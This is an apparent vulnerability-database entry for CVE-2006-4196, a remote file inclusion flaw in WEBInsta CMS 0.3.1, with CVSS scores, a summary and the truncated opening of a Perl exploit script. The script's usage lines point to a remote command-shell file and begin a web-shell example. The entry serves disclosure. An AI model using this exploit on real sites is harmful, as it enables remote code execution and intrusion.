7.5
CVSSv2

CVE-2006-4196

Published: 17/08/2006 Updated: 17/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in index.php in WEBInsta CMS 0.3.1 and possibly earlier allows remote malicious users to execute arbitrary PHP code via a URL in the templates_dir parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

webinsta cms

Exploits

#!/usr/bin/perl ## # WEBinsta CMS 031 (templates_dir) Remote File Inclusion Exploit # Bug Found & code By K-159 ## # echoorid (c) 2006 # ## # usage: # perl WEBinstapl <target> <cmd shell location> <cmd shell variable> # # perl WEBinstapl targetcom/ sitecom/cmdtxt cmd # # cmd shell example: <?passthr ...